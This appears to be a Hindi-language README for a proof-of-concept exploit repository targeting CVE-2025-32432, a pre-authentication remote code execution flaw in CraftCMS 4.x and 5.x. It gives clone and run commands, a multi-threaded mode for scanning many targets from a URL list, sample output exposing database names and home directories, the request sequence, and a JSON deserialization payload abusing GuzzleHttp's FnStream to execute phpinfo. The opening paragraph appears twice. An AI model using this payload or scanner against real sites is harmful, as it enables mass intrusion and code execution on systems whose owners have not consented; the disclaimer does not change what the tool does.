
इस रिपॉजिटरी में CVE-2025-32432 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट स्क्रिप्ट शामिल है, जो CraftCMS के 4.x और 5.x संस्करणों को प्रभावित करने वाली एक प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन (RCE) भेद्यता है। यह भेद्यता CraftCMS की एसेट ट्रांसफॉर्म जनरेशन सुविधा में मौजूद है।
यह रिपॉजिटरी CVE-2025-32432 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट स्क्रिप्ट है, जो CraftCMS के संस्करण 4.x और 5.x को प्रभावित करने वाली एक प्री-ऑथेंटिकेशन रिमोट कोड एक्सेक्यूशन (RCE) कमजोरी है। यह कमजोरी CraftCMS की एसेट ट्रांसफॉर्म जनरेशन सुविधा में मौजूद है।
यह एक्सप्लॉइट स्क्रिप्ट निम्नलिखित तरीकों से कमजोरी का पता लगाने और सत्यापन को स्वचालित करती है:
⚠️ यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
इस उपकरण का उपयोग केवल उन प्रणालियों के खिलाफ करें जिनका परीक्षण करने की आपको स्पष्ट अनुमति है। अनुमति के बिना प्रणालियों के खिलाफ अनधिकृत परीक्षण अवैध और अनैतिक है।
# Clone the repository
git clone https://github.com/Sachinart/CVE-2025-32432.git
cd CVE-2025-32432
# Install required dependencies
pip install -r requirements.txt
एकल लक्ष्य स्कैन करने के लिए:
python3 craftcms_rce.py -u example.com
एक फ़ाइल से एकाधिक लक्ष्यों को स्कैन करने के लिए (प्रति पंक्ति एक URL):
python3 craftcms_rce.py -f urls.txt -t 10
जहाँ -t उपयोग करने के लिए थ्रेड्स की संख्या निर्दिष्ट करता है (डिफ़ॉल्ट 5 है)।
-u, --url परीक्षण करने के लिए एकल URL
-f, --file परीक्षण करने के लिए URL वाली फ़ाइल (प्रति पंक्ति एक)
-t, --threads थ्रेड्स की संख्या (डिफ़ॉल्ट: 5)
-h, --help सहायता संदेश दिखाएं और बाहर निकलें
स्क्रिप्ट परिणामों को कंसोल पर आउटपुट करेगी और कमजोर लक्ष्यों को vulnerable.txt में CSV प्रारूप में सहेजेगी जिसमें निम्नलिखित कॉलम होंगे:
कंसोल आउटपुट का उदाहरण:
[*] Testing single target: https://example.com
[*] Starting scan with 5 threads
[+] VULNERABLE: https://example.com
CRAFT_DB_DATABASE: example_db
HOME Directory: /home/example
=== SCAN SUMMARY ===
Total URLs scanned: 1
Vulnerable sites: 1
Detailed results saved to vulnerable.txt
यह कमजोरी CraftCMS में एक डिसिरियलाइजेशन समस्या का शोषण करती है। शोषण:
/index.php?p=admin/dashboard पर GET अनुरोध करता है/index.php?p=admin/actions/assets/generate-transform पर POST अनुरोध भेजता हैGuzzleHttp\Psr7\FnStream क्लास के माध्यम से मनमाना कोड निष्पादन की ओर ले जाता हैphpinfo() को निष्पादित करके और विशिष्ट सिस्टम जानकारी निकालकर की जाती हैशोषण एसेट ट्रांसफॉर्म जनरेशन प्रक्रिया में एक असुरक्षित डिसिरियलाइजेशन का लाभ उठाता है। कमजोर कोड पथ हमलावर को एक कस्टम PHP ऑब्जेक्ट इंजेक्ट करने की अनुमति देता है जो अनसिरियलाइज़ हो जाता है, जिससे मनमाना कोड निष्पादन होता है।
पेलोड के प्रमुख घटक:
{
"assetId": 11,
"handle": {
"width": 123,
"height": 123,
"as session": {
"class": "craft\\behaviors\\FieldLayoutBehavior",
"__class": "GuzzleHttp\\Psr7\\FnStream",
"__construct()": [[]],
"_fn_close": "phpinfo"
}
}
}
योगदान, समस्याएं और सुविधा अनुरोधों का स्वागत है! issues पृष्ठ देखने के लिए स्वतंत्र महसूस करें।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।